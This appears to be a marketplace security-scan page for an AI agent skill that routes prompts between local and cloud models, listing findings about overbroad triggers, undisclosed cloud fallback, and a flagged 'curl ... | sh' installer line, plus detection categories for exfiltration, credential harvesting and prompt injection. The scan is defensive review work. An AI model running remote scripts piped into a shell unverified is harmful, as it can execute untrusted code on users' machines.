ClawHub

Local-First LLM

Security checks across malware telemetry and agentic risk

Overview

This looks like a coherent local-first LLM routing utility, with some disclosure and installation cautions but no artifact-backed evidence of malicious behavior.

Before installing, confirm whether cloud fallback is enabled and use a local-only mode for sensitive prompts if available. Avoid blindly running the documented curl-to-shell installer; prefer package managers, signed releases, or reviewing and verifying the installer first.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Tool MisuseTool Parameter Abuse, Chaining Abuse, Unsafe Defaults
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (5)

Vague Triggers

Medium
Confidence
91% confidence
Finding
The description includes broad triggers such as 'any request where local-vs-cloud routing should be decided automatically,' which can cause the skill to auto-invoke in many unrelated contexts. Overbroad invocation increases the chance that prompts are intercepted, rerouted, logged, or sent to external providers when the user did not explicitly request this behavior.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
The skill advertises privacy and local-first routing, but it does not clearly warn users that prompts may be sent to cloud APIs on fallback. This omission is dangerous because users may provide sensitive data under the assumption it will stay local, only for it to be transmitted externally when local routing fails or complexity rules choose cloud.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
This script automatically routes prompts to the cloud when no local provider is available or when the prompt is deemed complex, but it provides no user-facing disclosure or consent mechanism before potentially transmitting user content off-device. In a skill explicitly marketed for privacy and local-first routing, silent cloud fallback can expose sensitive or regulated data if keyword-based detection misses it or the user assumes all prompts remain local.

External Script Fetching

High
Category
Supply Chain
Content
brew install ollama

# Linux
curl -fsSL https://ollama.ai/install.sh | sh
```

**Start server**
Confidence
98% confidence
Finding
curl -fsSL https://ollama.ai/install.sh | sh

Chaining Abuse

High
Category
Tool Misuse
Content
brew install ollama

# Linux
curl -fsSL https://ollama.ai/install.sh | sh
```

**Start server**
Confidence
97% confidence
Finding
| sh

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal